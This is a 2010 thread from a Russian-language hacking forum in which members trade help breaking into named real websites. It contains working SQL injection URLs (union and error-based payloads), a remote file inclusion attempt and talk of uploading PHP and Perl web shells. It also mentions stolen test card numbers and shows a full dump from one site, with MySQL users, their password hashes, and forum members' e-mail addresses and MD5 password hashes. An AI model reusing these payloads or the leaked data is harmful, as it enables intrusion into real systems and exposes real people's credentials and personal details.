27.03.2010, 13:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Darren
Господа, помогите подобрать столбцы, немогу разобраться
http://www.orderflowers.co.il/products.php?cid=49%20%20and(1=1)
либо:
Код:
_http://www.orderflowers.co.il/products.php?cid=49+and+(1,1)=(select+*+from+(select+name_const(version(),1),name_const(version(),1))eba%20)
Duplicate column name '5.0.77'
|
|
|
27.03.2010, 13:57
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Сообщение от Sc0rpi0n
1.
Код:
http://www.orderflowers.co.il/products.php?cid=49 order by 13 --
2.
Код:
http://www.orderflowers.co.il/products.php?cid=49 and 1 = 0 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13 --
шелл не залить, админку не нашёл, картон 2 штуки и то тестовые) хех)
|
|
|
|
04.04.2010, 12:48
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Nek1t
В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:
Получаю:
Perl точно установлен, т.к. через perl script.pl все работает.
Набираю в Opera:
http://www.ettisalqatar.com/cgi-script/test.pl
http://www.ettisalqatar.com/cgi-bin/test.pl
http://www.ettisalqatar.com/cgi-script/script.pl
http://www.ettisalqatar.com/cgi-bin/script.pl
Не могу найти shell.
И, подскажите статью по заливке Perl Shell.
Заранее всем спасибо.
|
|
|
|
08.04.2010, 12:34
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не могу найти админку: http://www.ehealth2008.si/index.php
Сканер только это нашел:
http://www.ehealth2008.si/images/ HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/stats/ HTTP 401 Authorization Required
http://www.ehealth2008.si/server-status/ HTTP 403 Forbidden
http://www.ehealth2008.si/about.php HTTP 200 OK
http://www.ehealth2008.si/icons/ HTTP 200 OK
http://www.ehealth2008.si/index.php HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/style.css HTTP 200 OK
http://www.ehealth2008.si/cgi-bin/ HTTP 403 Forbidden
Помогите, плиз.
|
|
|
|
08.04.2010, 12:44
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от FlaktW
Не могу найти админку: http://www.ehealth2008.si/index.php
Сканер только это нашел:
http://www.ehealth2008.si/images/ HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/stats/ HTTP 401 Authorization Required
http://www.ehealth2008.si/server-status/ HTTP 403 Forbidden
http://www.ehealth2008.si/about.php HTTP 200 OK
http://www.ehealth2008.si/icons/ HTTP 200 OK
http://www.ehealth2008.si/index.php HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/style.css HTTP 200 OK
http://www.ehealth2008.si/cgi-bin/ HTTP 403 Forbidden
Помогите, плиз.
почти уверен что тут админки нету,скорее всего сайт админится через фтп!
|
|
|
|
08.04.2010, 12:57
|
|
Новичок
Регистрация: 07.04.2010
Сообщений: 2
С нами:
8472041
Репутация:
0
|
|
http://www.prodisney.ru/index.php?page=GPI
все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?
пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
|
|
|
|
08.04.2010, 13:21
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от melky
http://www.prodisney.ru/index.php?page=GPI
все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?
пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
здесь нету RFI
|
|
|
|
08.04.2010, 13:40
|
|
Новичок
Регистрация: 07.04.2010
Сообщений: 2
С нами:
8472041
Репутация:
0
|
|
Сообщение от 547
здесь нету RFI
http://www.prodisney.ru/index.php?page=http://google.ru/index.php
|
|
|
|
17.04.2010, 00:04
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от jecka3000
очень прошу помощи, не выводит результат из столбцов.
http://amkar.properm.ru/info.php?id=-12+UNION+SELECT+concat_ws(unhex(hex(email,0x20,pas sword)))+from+0x6670705f6d656d62657273--
П.С. Вся информация в исходном коде, в таком виде,например: <br> <img src="graffiti/ warn_lastwarn"></p><p align = "center"><br>
мне же нужно вывести из таблы fpp_members столбцы name password email
не выводит, помогите) ммм... 
Код:
http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29
Version: 5.0.51a-24+lenny2-log
Current User: properm@localhost
Код:
Data Bases:
_muzik
amkar
amkar_fan
amore
avto
baba
bikini
comix
contests
euroset
forum
globass
klass
kvn
led
linkation
map
miss_whatever
miss_zima
moda
muzik
muzik_old
mysql
nebo
nevesta
newseater
permskoe
properm
reality
reality_backup
seolib
sf
spravka
spravka2
spravka_backup_2009_10_31
spravka_backup_2009_11_07
User:
'root'@'localhost'
'reality'@'localhost'
'realty'@'localhost'
'seo'@'localhost'
'sprvk'@'localhost'
'zabbix'@'localhost'
'spravka'@'localhost'
'properm'@'localhost'
'debian-sys-maint'@'localhost'
'root'@'proserv'
'alya'@'%'
'replication_user'@'%'
'remote_root'@'%'
MySQL DB
User Password
alya *8D43FE3D5955DD53B1156534EE7AD854CA88FF24
remote_root
replication_user *A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601
debian-sys-maint *D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97
properm *C58CE76F735421EB5B5BC2BB332CEF2674661499
reality *66758BD9AE5EFE6F5EFD754A0386969808EE2991
realty *27D8E13E226CE3F3DB6116796584A6BCF2AA3305
root *966F8B69DCE8F1383221C7E89C8AB06697332DAC
seo *6063C78456BB048BAF36BE1104D12D547834DFEA
spravka *050376F3855A67F5E2C6514FD3130B31006C1276
sprvk *30763283C56FC465C0F1F869CD097A5ABDF1F4D9
zabbix *2D90A69B6136A8DE2E6B87DC14504CE500DA21CF
root *CAC83AB2E75198C3287CD7E81B808F9C6D54B41A
DATABASE: forum
(TABLES):
fpp_admin_logs
fpp_admin_sessions
fpp_badwords
fpp_cache_store
fpp_calendar_events
fpp_categories
fpp_contacts
fpp_css
fpp_email_logs
fpp_emoticons
fpp_faq
fpp_files
fpp_files_cats
fpp_files_comments
fpp_files_custentered
fpp_files_custfields
fpp_files_downloads
fpp_files_favorites
fpp_files_votes
fpp_forum_perms
fpp_forum_tracker
fpp_forums
fpp_groups
fpp_languages
fpp_macro
fpp_macro_name
fpp_member_extra
fpp_members
fpp_messages
fpp_moderator_logs
fpp_moderators
fpp_pfields_content
fpp_pfields_data
fpp_polls
fpp_posts
fpp_reg_antispam
fpp_search_results
fpp_sessions
fpp_skin_templates
fpp_skins
fpp_spider_logs
fpp_stats
fpp_subscription_currency
fpp_subscription_extra
fpp_subscription_logs
fpp_subscription_methods
fpp_subscription_trans
fpp_subscriptions
fpp_templates
fpp_titles
fpp_tmpl_names
fpp_topic_mmod
fpp_topics
fpp_tracker
fpp_validating
fpp_voters
fpp_warn_logs
ibf_admin_logs
ibf_admin_sessions
ibf_announcements
ibf_attachments
ibf_attachments_type
ibf_badwords
ibf_banfilters
ibf_bulk_mail
ibf_cache_store
ibf_calendar_events
ibf_conf_settings
ibf_conf_settings_titles
ibf_contacts
ibf_custom_bbcode
ibf_email_logs
ibf_emoticons
ibf_faq
ibf_forum_perms
ibf_forum_tracker
ibf_forums
ibf_groups
ibf_languages
ibf_mail_error_logs
ibf_mail_queue
ibf_member_extra
ibf_members
ibf_members_converge
ibf_message_text
ibf_message_topics
ibf_moderator_logs
ibf_moderators
ibf_pfields_content
ibf_pfields_data
ibf_polls
ibf_posts
ibf_reg_antispam
ibf_search_results
ibf_sessions
ibf_skin_macro
ibf_skin_sets
ibf_skin_templates
ibf_skin_templates_cache
ibf_spider_logs
ibf_subscription_currency
ibf_subscription_extra
ibf_subscription_logs
ibf_subscription_methods
ibf_subscription_trans
ibf_subscriptions
ibf_task_logs
ibf_task_manager
ibf_titles
ibf_topic_mmod
ibf_topics
ibf_topics_read
ibf_tracker
ibf_upgrade_history
ibf_validating
ibf_voters
ibf_warn_logs
Table: fpp_members
email password name test@localhost.com chucha pn@reaktive.ru 7277da89be64a89aa02a2d7423a0c05c Guest
red_ma@mail.ru 81dc9bdb52d04dc20036dbd8313ed055 Juissy
vsv1407@yandex.ru 1406e7afb3eb1f83b4bd4e310cee7fc6 magic
ca@properm.ru 287e9593819b2fcdf9945e7ccacd637d reaktive
pn@reaktive.ru 72fed2b8265919690c815f0316b346cc scbsncks
ve@properm.ru b0baee9d279d34fa1dfd71aadb908c3f wer
stasne@yandex.ru 48309aa13d9d9497b097495188b2863a Николай
|
|
|
|
03.06.2010, 01:01
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Konqi
ребят вот интересует вопрос, если повесить iframe в индексе сайта и перенаправить трафик на Xсайт, то через какое то время у сайта X Page Rank выростит?
то есть связано ли показатель google-a с посещаемостью сайта ?
не связаны
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2078573){kind=avatar}
Похожие темы
Комбинированный вид
